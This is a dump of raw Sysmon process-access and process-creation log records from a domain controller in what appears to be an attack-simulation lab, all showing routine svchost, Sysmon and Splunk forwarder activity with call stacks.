13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.610{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 